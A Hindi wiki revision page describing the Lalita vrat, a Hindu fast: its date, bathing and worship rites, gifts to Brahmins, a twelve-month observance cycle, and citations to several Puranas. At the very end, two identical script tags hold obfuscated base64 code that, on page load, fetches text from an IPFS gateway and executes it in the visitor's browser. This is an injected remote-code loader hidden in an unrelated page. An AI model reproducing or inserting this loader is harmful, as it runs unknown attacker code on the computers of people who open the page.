ललिता व्रत: Difference between revisions

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
('*भारत में धार्मिक व्रतों का सर्वव्यापी प्रचार रहा ...' के साथ नया पन्ना बनाया)
 
m (ललिताव्रत का नाम बदलकर ललिता व्रत कर दिया गया है)
(No difference)

Revision as of 09:32, 8 September 2010

  • भारत में धार्मिक व्रतों का सर्वव्यापी प्रचार रहा है। यह हिन्दू धर्म ग्रंथों में उल्लखित हिन्दू धर्म का एक व्रत संस्कार है।
  • यह व्रत माघ शुक्ल पक्ष की तृतीया को रखना चाहिए।
  • दोपहर को तिल एवं आमलक से किसी नदी में स्नान करके, पुष्पों आदि से देवी पूजा की पूजा करनी चाहिए।
  • इसमे तामपत्र में जल अक्षत एवं सोना रख कर एक ब्राह्मण के समक्ष रखा जाता है, जो मंत्र के साथ कर्ता पर जल छिड़कता है। इस व्रत में स्त्री सम्पादिका सोने का दान करती है, कुश डुबोये जल को पीती है, देवी ध्यान में पृथ्वी शयन करती है और रात्रि बिताती है।
  • दूसरे दिन ब्राह्मणों एवं एक सधवा नारी का सम्मान करना चाहिए। एक वर्ष तक, प्रत्येक मास में देवी के 12 नामों में से एक का प्रयोग [1] करना चाहिए। बारह मासों में शुक्ल पक्ष की तृतीया पर उपवास करें तथा 12 वस्तुओं में क्रम से एक सेवन करें, यथा-कुश से पवित्र किया हुआ जल, दूध, घी आदि। अन्त में एक ब्राह्मण एवं उसकी पत्नी को सम्मान देना चाहिए।
  • सम्पादिका को पुत्रों, रूप, स्वास्थ्य एवं सधवापन की प्राप्ति होती है। [2] अग्निपुराण [3] में ललिता तृतीया का उल्लेख किया है और कहा है कि चैत्र शुक्ल तृतीया को गौरी जी शिव से विवाहित हुई थीं। यही बात मत्स्यपुराण [4] में भी है, मत्स्यपुराण [5] में आया है कि सती को ललिता कहा जाता है, क्योंकि वह सभी लोकों में सर्वोत्तम हैं और रूप में सब से बढ़कर हैं। ब्रह्मण्डपुराण के अन्त में 44 अध्यायों में ललिता सम्प्रदाय का विवेचन है।


पन्ने की प्रगति अवस्था
आधार
प्रारम्भिक
माध्यमिक
पूर्णता
शोध

टीका टिप्पणी और संदर्भ

  1. (यथा-पहले मास में ईशानी, 8वें में ललिता तथा 12वें में गौरी)
  2. हेमाद्रि (व्रतखण्ड 1, 418-421, भविष्योत्तरपुराण से उद्धरण)।
  3. अग्निपुराण (178|1-2)
  4. मत्स्यपुराण (60|14-15)
  5. मत्स्यपुराण (60|11)

संबंधित लिंक

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>